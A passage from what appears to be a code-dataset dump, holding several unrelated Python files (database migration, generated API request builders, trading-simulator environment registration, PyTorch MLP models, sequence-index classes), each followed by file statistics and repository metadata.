sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('shopping_list',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('branches',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('farmer_id', sa.Integer(), nullable=True),
sa.Column('location', sa.String(length=300), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['farmer_id'], ['farmers.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('branches')
op.drop_table('shopping_list')
op.drop_table('purchases')
op.drop_table('product_ratings')
op.drop_table('farmers')
op.drop_table('deliveries')
op.drop_table('cart')
op.drop_table('products')
op.drop_table('trips')
op.drop_table('product_sub_types')
op.drop_table('payments')
op.drop_table('earnings')
op.drop_table('vehicles')
op.drop_table('transporters')
op.drop_table('transporter_ratings')
op.drop_table('transporter_current_location')
op.drop_table('roles')
op.drop_table('product_types')
op.drop_table('orders')
op.drop_table('loans')
op.drop_table('farmer_address')
op.drop_table('documents')
op.drop_table('vehicle_Type')
op.drop_table('variables')
op.drop_table('users')
op.drop_table('product_categories')
op.drop_table('locations')
op.drop_table('counties')
# ### end Alembic commands ###
| 47.679775 | 137 | 0.671262 | 2,184 | 16,974 | 5.110348 | 0.079212 | 0.129737 | 0.186811 | 0.212615 | 0.831556 | 0.822059 | 0.792581 | 0.773139 | 0.711227 | 0.685422 | 0 | 0.013007 | 0.130376 | 16,974 | 355 | 138 | 47.814085 | 0.743107 | 0.016908 | 0 | 0.519288 | 0 | 0 | 0.173273 | 0.011051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005935 | false | 0.005935 | 0.005935 | 0 | 0.011869 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3a935a20ab7461c3615a2c8b4fcfd164377b29da | 5,747 | py | Python | test/vanilla/low-level/Expected/AcceptanceTests/BodyDateTimeLowLevel/bodydatetimelowlevel/rest/datetime/__init__.py | cfculhane/autorest.python | 8cbca95faee88d933a58bbbd17b76834faa8d387 | [
"MIT"
] | 35 | 2018-04-03T12:15:53.000Z | 2022-03-11T14:03:34.000Z | test/vanilla/low-level/Expected/AcceptanceTests/BodyDateTimeLowLevel/bodydatetimelowlevel/rest/datetime/__init__.py | cfculhane/autorest.python | 8cbca95faee88d933a58bbbd17b76834faa8d387 | [
"MIT"
] | 652 | 2017-08-28T22:44:41.000Z | 2022-03-31T21:20:31.000Z | test/vanilla/low-level/Expected/AcceptanceTests/BodyDateTimeLowLevel/bodydatetimelowlevel/rest/datetime/__init__.py | cfculhane/autorest.python | 8cbca95faee88d933a58bbbd17b76834faa8d387 | [
"MIT"
] | 29 | 2017-08-28T20:57:01.000Z | 2022-03-11T14:03:38.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._request_builders_py3 import build_get_null_request
from ._request_builders_py3 import build_get_invalid_request
from ._request_builders_py3 import build_get_overflow_request
from ._request_builders_py3 import build_get_underflow_request
from ._request_builders_py3 import build_put_utc_max_date_time_request
from ._request_builders_py3 import build_put_utc_max_date_time7_digits_request
from ._request_builders_py3 import build_get_utc_lowercase_max_date_time_request
from ._request_builders_py3 import build_get_utc_uppercase_max_date_time_request
from ._request_builders_py3 import build_get_utc_uppercase_max_date_time7_digits_request
from ._request_builders_py3 import build_put_local_positive_offset_max_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_lowercase_max_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_uppercase_max_date_time_request
from ._request_builders_py3 import build_put_local_negative_offset_max_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_uppercase_max_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_lowercase_max_date_time_request
from ._request_builders_py3 import build_put_utc_min_date_time_request
from ._request_builders_py3 import build_get_utc_min_date_time_request
from ._request_builders_py3 import build_put_local_positive_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_min_date_time_request
from ._request_builders_py3 import build_put_local_negative_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_no_offset_min_date_time_request
except (SyntaxError, ImportError):
from ._request_builders import build_get_null_request # type: ignore
from ._request_builders import build_get_invalid_request # type: ignore
from ._request_builders import build_get_overflow_request # type: ignore
from ._request_builders import build_get_underflow_request # type: ignore
from ._request_builders import build_put_utc_max_date_time_request # type: ignore
from ._request_builders import build_put_utc_max_date_time7_digits_request # type: ignore
from ._request_builders import build_get_utc_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_get_utc_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_get_utc_uppercase_max_date_time7_digits_request # type: ignore
from ._request_builders import build_put_local_positive_offset_max_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_put_local_negative_offset_max_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_put_utc_min_date_time_request # type: ignore
from ._request_builders import build_get_utc_min_date_time_request # type: ignore
from ._request_builders import build_put_local_positive_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_min_date_time_request # type: ignore
from ._request_builders import build_put_local_negative_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_no_offset_min_date_time_request # type: ignore
__all__ = [
"build_get_null_request",
"build_get_invalid_request",
"build_get_overflow_request",
"build_get_underflow_request",
"build_put_utc_max_date_time_request",
"build_put_utc_max_date_time7_digits_request",
"build_get_utc_lowercase_max_date_time_request",
"build_get_utc_uppercase_max_date_time_request",
"build_get_utc_uppercase_max_date_time7_digits_request",
"build_put_local_positive_offset_max_date_time_request",
"build_get_local_positive_offset_lowercase_max_date_time_request",
"build_get_local_positive_offset_uppercase_max_date_time_request",
"build_put_local_negative_offset_max_date_time_request",
"build_get_local_negative_offset_uppercase_max_date_time_request",
"build_get_local_negative_offset_lowercase_max_date_time_request",
"build_put_utc_min_date_time_request",
"build_get_utc_min_date_time_request",
"build_put_local_positive_offset_min_date_time_request",
"build_get_local_positive_offset_min_date_time_request",
"build_put_local_negative_offset_min_date_time_request",
"build_get_local_negative_offset_min_date_time_request",
"build_get_local_no_offset_min_date_time_request",
]
| 71.8375 | 114 | 0.835914 | 813 | 5,747 | 5.211562 | 0.088561 | 0.09063 | 0.169932 | 0.114704 | 0.914798 | 0.901581 | 0.892141 | 0.860751 | 0.817088 | 0.725513 | 0 | 0.005649 | 0.106664 | 5,747 | 79 | 115 | 72.746835 | 0.819634 | 0.128415 | 0 | 0 | 0 | 0 | 0.20245 | 0.20245 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.642857 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aae877ff69f2b146deb54358ecfaf09274153a2d | 76 | py | Python | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from pwm_out_partial import get_ip_name
from pwm_out_partial import PWM_OUT
| 25.333333 | 39 | 0.894737 | 15 | 76 | 4.066667 | 0.533333 | 0.295082 | 0.327869 | 0.557377 | 0.754098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 76 | 2 | 40 | 38 | 0.897059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a30b1a9eae8327fba99afeb80bf4a08f5b0aa37a | 110 | py | Python | httpd/app/routes.py | flavio-fernandes/basic-lb | 4e03cd769d7f91279eac1fc4b2b6efa8aa98cc2d | [
"MIT"
] | null | null | null | httpd/app/routes.py | flavio-fernandes/basic-lb | 4e03cd769d7f91279eac1fc4b2b6efa8aa98cc2d | [
"MIT"
] | null | null | null | httpd/app/routes.py | flavio-fernandes/basic-lb | 4e03cd769d7f91279eac1fc4b2b6efa8aa98cc2d | [
"MIT"
] | null | null | null | from app import app
import os
@app.route('/')
def index():
return os.environ.get("MSG", "Hello, World!")
| 15.714286 | 49 | 0.645455 | 17 | 110 | 4.176471 | 0.764706 | 0.253521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163636 | 110 | 6 | 50 | 18.333333 | 0.771739 | 0 | 0 | 0 | 0 | 0 | 0.154545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
6ea9762ab3a1b10cd72d74425826005829a3d8f1 | 1,357 | py | Python | utils/util.py | michelefontana92/HOLDA | 9136856820f6284a21baa929df863e3dcdfa62d7 | [
"MIT"
] | null | null | null | utils/util.py | michelefontana92/HOLDA | 9136856820f6284a21baa929df863e3dcdfa62d7 | [
"MIT"
] | null | null | null | utils/util.py | michelefontana92/HOLDA | 9136856820f6284a21baa929df863e3dcdfa62d7 | [
"MIT"
] | null | null | null | import os
def create_model_name(path, global_id, local_id, personalized=False):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if personalized:
save_model_path = f'{base_dir}/personalized_{filename_split[0]}_{global_id}_{local_id}.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/{filename_split[0]}_{global_id}_{local_id}.{filename_split[1]}'
return save_model_path
def create_model_name_state(path, state_id, personalized=False):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if personalized:
save_model_path = f'{base_dir}/personalized_state_{filename_split[0]}_{state_id}.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/state_{filename_split[0]}_{state_id}.{filename_split[1]}'
return save_model_path
def create_model_name_monitor(path, state_id, input=True):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if input:
save_model_path = f'{base_dir}/monitor_{filename_split[0]}_{state_id}_in.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/monitor_{filename_split[0]}_{state_id}_out.{filename_split[1]}'
return save_model_path
| 37.694444 | 115 | 0.717023 | 195 | 1,357 | 4.589744 | 0.158974 | 0.261453 | 0.130726 | 0.093855 | 0.894972 | 0.894972 | 0.894972 | 0.858101 | 0.858101 | 0.804469 | 0 | 0.01039 | 0.148858 | 1,357 | 35 | 116 | 38.771429 | 0.764502 | 0 | 0 | 0.607143 | 0 | 0.035714 | 0.334562 | 0.332351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.035714 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e013453318d67f3973834e9f7382f9867854d1a | 3,534 | py | Python | gym_mtsim/__init__.py | webclinic017/gym-mtsim | 40c08e98d8c2574560f0e5e8da35415b9e95b4db | [
"MIT"
] | 67 | 2021-09-07T20:31:13.000Z | 2022-03-25T21:15:50.000Z | gym_mtsim/__init__.py | webclinic017/gym-mtsim | 40c08e98d8c2574560f0e5e8da35415b9e95b4db | [
"MIT"
] | 22 | 2021-09-14T09:31:37.000Z | 2022-03-21T16:36:56.000Z | gym_mtsim/__init__.py | webclinic017/gym-mtsim | 40c08e98d8c2574560f0e5e8da35415b9e95b4db | [
"MIT"
] | 25 | 2021-09-08T07:02:59.000Z | 2022-03-29T12:17:52.000Z | from gym.envs.registration import register
from .metatrader import Timeframe, SymbolInfo
from .simulator import MtSimulator, OrderType, Order, SymbolNotFound, OrderNotFound
from .envs import MtEnv
from .data import FOREX_DATA_PATH, STOCKS_DATA_PATH, CRYPTO_DATA_PATH, MIXED_DATA_PATH
register(
id='forex-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=FOREX_DATA_PATH, hedge=True),
'trading_symbols': ['EURUSD', 'GBPCAD', 'USDJPY'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: 0.03 if 'JPY' in symbol else 0.0003
}
)
register(
id='forex-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=FOREX_DATA_PATH, hedge=False),
'trading_symbols': ['EURUSD', 'GBPCAD', 'USDJPY'],
'window_size': 10,
'fee': lambda symbol: 0.03 if 'JPY' in symbol else 0.0003
}
)
register(
id='stocks-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=STOCKS_DATA_PATH, hedge=True),
'trading_symbols': ['GOGL', 'AAPL', 'TSLA', 'MSFT'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': 0.2
}
)
register(
id='stocks-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=STOCKS_DATA_PATH, hedge=False),
'trading_symbols': ['GOGL', 'AAPL', 'TSLA', 'MSFT'],
'window_size': 10,
'fee': 0.2
}
)
register(
id='crypto-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=CRYPTO_DATA_PATH, hedge=True),
'trading_symbols': ['BTCUSD', 'ETHUSD', 'BCHUSD'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: {
'BTCUSD': 50.0,
'ETHUSD': 3.0,
'BCHUSD': 0.5,
}[symbol]
}
)
register(
id='crypto-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=CRYPTO_DATA_PATH, hedge=False),
'trading_symbols': ['BTCUSD', 'ETHUSD', 'BCHUSD'],
'window_size': 10,
'fee': lambda symbol: {
'BTCUSD': 50.0,
'ETHUSD': 3.0,
'BCHUSD': 0.5,
}[symbol]
}
)
register(
id='mixed-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=MIXED_DATA_PATH, hedge=True),
'trading_symbols': ['EURUSD', 'USDCAD', 'GOGL', 'AAPL', 'BTCUSD', 'ETHUSD'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: {
'EURUSD': 0.0002,
'USDCAD': 0.0005,
'GOGL': 0.15,
'AAPL': 0.01,
'BTCUSD': 50.0,
'ETHUSD': 3.0,
}[symbol]
}
)
register(
id='mixed-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=MIXED_DATA_PATH, hedge=False),
'trading_symbols': ['EURUSD', 'USDCAD', 'GOGL', 'AAPL', 'BTCUSD', 'ETHUSD'],
'window_size': 10,
'fee': lambda symbol: {
'EURUSD': 0.0002,
'USDCAD': 0.0005,
'GOGL': 0.15,
'AAPL': 0.01,
'BTCUSD': 50.0,
'ETHUSD': 3.0,
}[symbol]
}
)
| 28.967213 | 90 | 0.584041 | 402 | 3,534 | 4.935323 | 0.174129 | 0.048387 | 0.048387 | 0.060484 | 0.849798 | 0.83619 | 0.827117 | 0.818044 | 0.731855 | 0.689516 | 0 | 0.039755 | 0.259762 | 3,534 | 121 | 91 | 29.206612 | 0.718654 | 0 | 0 | 0.666667 | 0 | 0 | 0.283531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.045045 | 0 | 0.045045 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e28d9c364d283cdb9d24eadc179c2df1052d966 | 5,464 | py | Python | dlutils/models/pytorch/MLPNetwork.py | chelseajohn/dlapplication | d2eaba9077320f5a33e122b99691577fe899e1d6 | [
"Apache-2.0"
] | 2 | 2020-05-07T05:08:54.000Z | 2020-05-13T10:14:53.000Z | dlutils/models/pytorch/MLPNetwork.py | chelseajohn/dlapplication | d2eaba9077320f5a33e122b99691577fe899e1d6 | [
"Apache-2.0"
] | null | null | null | dlutils/models/pytorch/MLPNetwork.py | chelseajohn/dlapplication | d2eaba9077320f5a33e122b99691577fe899e1d6 | [
"Apache-2.0"
] | 3 | 2020-05-06T18:49:37.000Z | 2020-07-13T05:11:56.000Z | import torch.nn as nn
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
import numpy as np
import random
class MLPNet(nn.Module):
def __init__(self):
super(MLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return x
def __str__(self):
return "MLP 2 layered"
class DeepMLPNet(nn.Module):
def __init__(self):
super(DeepMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 150)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(150, 100)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(100, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 50)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(50, 50)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
self.fc6 = nn.Linear(50, 25)
init.xavier_normal_(self.fc6.weight.data)
init.zeros_(self.fc6.bias.data)
self.fc7 = nn.Linear(25, 25)
init.xavier_normal_(self.fc7.weight.data)
init.zeros_(self.fc7.bias.data)
self.fc8 = nn.Linear(25, 25)
init.xavier_normal_(self.fc8.weight.data)
init.zeros_(self.fc8.bias.data)
self.fc9 = nn.Linear(25, 10)
init.xavier_normal_(self.fc9.weight.data)
init.zeros_(self.fc9.bias.data)
self.fc10 = nn.Linear(10, 10)
init.xavier_normal_(self.fc10.weight.data)
init.zeros_(self.fc10.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
x = F.relu(self.fc9(x))
x = F.relu(self.fc10(x))
return x
def __str__(self):
return "MLP 10 layered"
class OneOutputMLPNet(nn.Module):
def __init__(self):
super(OneOutputMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 150)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(150, 150)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(150, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 100)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(100, 50)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
self.fc6 = nn.Linear(50, 25)
init.xavier_normal_(self.fc6.weight.data)
init.zeros_(self.fc6.bias.data)
self.fc7 = nn.Linear(25, 10)
init.xavier_normal_(self.fc7.weight.data)
init.zeros_(self.fc7.bias.data)
self.fc8 = nn.Linear(10, 1)
init.xavier_normal_(self.fc8.weight.data)
init.zeros_(self.fc8.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
return x
def __str__(self):
return "MLP with 1 output"
class WideOneOutputMLPNet(nn.Module):
def __init__(self):
super(WideOneOutputMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 200)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(200, 250)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(250, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 50)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(50, 1)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
return x
def __str__(self):
return "MLP with wide layers"
| 31.402299 | 51 | 0.597365 | 815 | 5,464 | 3.846626 | 0.080982 | 0.063796 | 0.023923 | 0.055821 | 0.881978 | 0.852951 | 0.822329 | 0.822329 | 0.786922 | 0.767783 | 0 | 0.060035 | 0.262262 | 5,464 | 173 | 52 | 31.583815 | 0.717688 | 0 | 0 | 0.708609 | 0 | 0 | 0.011713 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07947 | false | 0 | 0.046358 | 0.02649 | 0.205298 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
280cfe69ff9acadc9a53ff1a24c3357efab1ee0a | 109 | py | Python | tests/test_scrot.py | yueranyuan/pyscreenshot | 3287b798691de8791bc3b3314f2545f7b0b1cb99 | [
"BSD-2-Clause"
] | null | null | null | tests/test_scrot.py | yueranyuan/pyscreenshot | 3287b798691de8791bc3b3314f2545f7b0b1cb99 | [
"BSD-2-Clause"
] | null | null | null | tests/test_scrot.py | yueranyuan/pyscreenshot | 3287b798691de8791bc3b3314f2545f7b0b1cb99 | [
"BSD-2-Clause"
] | null | null | null | from ref import backend_ref
from size import backend_size
def test_size_scrot():
backend_size('scrot')
| 15.571429 | 29 | 0.779817 | 17 | 109 | 4.705882 | 0.470588 | 0.325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155963 | 109 | 6 | 30 | 18.166667 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0.045872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
28a08294cde4f54867de8b043a1016c471914c50 | 2,459 | py | Python | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | import bisect
class AlternatingIndex(object):
""" Holds a subsequence index for a text T """
def __init__(self, t, k, ival):
""" Create index from all subsequences consisting of k characters
spaced ival positions apart. E.g., SubseqIndex("ATAT", 2, 2)
extracts ("AA", 0) and ("TT", 1). """
self.k = k # num characters per subsequence extracted
self.ival = ival # space between them; 1=adjacent, 2=every other, etc
self.index = []
self.span = 1 + ival * (k - 1)
for i in range(len(t) - self.span + 1): # for each subseq
self.index.append((t[i:i+self.span:ival], i)) # add (subseq, offset)
self.index.sort() # alphabetize by subseq
def query(self, p):
""" Return index hits for first subseq of p """
subseq = p[:self.span:self.ival] # query with first subseq
i = bisect.bisect_left(self.index, (subseq, -1)) # binary search
hits = []
while i < len(self.index): # collect matching index entries
if self.index[i][0] != subseq:
break
hits.append(self.index[i][1])
i += 1
return hits
class GappedIndex(object):
""" Holds a subsequence index for a text T """
def __init__(self, t, k, ival):
""" Create index from subsequences consisting of
2 substrings of k characters spaced ival positions apart.
E.g., SubseqIndex("ATCCGG", 2, 2) extracts ("ATGG", 0)
"""
self.k = k # num characters per subsequence extracted
self.ival = ival # space between them; 1=adjacent, 2=every other, etc
self.index = []
self.span = 2*k + ival
for i in range(len(t) - self.span + 1): # for each subseq
self.index.append((t[i:k+i]+t[k+i+ival:2*k+i+ival], i)) # add (subseq, offset)
self.index.sort() # alphabetize by subseq
def query(self, p):
""" Return index hits for first subseq of p """
subseq = p[:self.k]+p[self.k+self.ival:2*self.k+self.ival] # query with first subseq
print('search for' + subseq)
i = bisect.bisect_left(self.index, (subseq, -1)) # binary search
hits = []
while i < len(self.index): # collect matching index entries
if self.index[i][0] != subseq:
break
hits.append(self.index[i][1])
i += 1
return hits
| 42.396552 | 93 | 0.562017 | 338 | 2,459 | 4.059172 | 0.239645 | 0.091837 | 0.029155 | 0.033528 | 0.835277 | 0.835277 | 0.798834 | 0.798834 | 0.798834 | 0.798834 | 0 | 0.01592 | 0.310289 | 2,459 | 57 | 94 | 43.140351 | 0.793042 | 0.374136 | 0 | 0.75 | 0 | 0 | 0.006993 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.025 | 0 | 0.225 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9552d2e5dc7a6cd5f1eda4bbe0acbc281f5b62ec | 155 | py | Python | slam_recognition/util/energy/__init__.py | SimLeek/pySILEnT | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
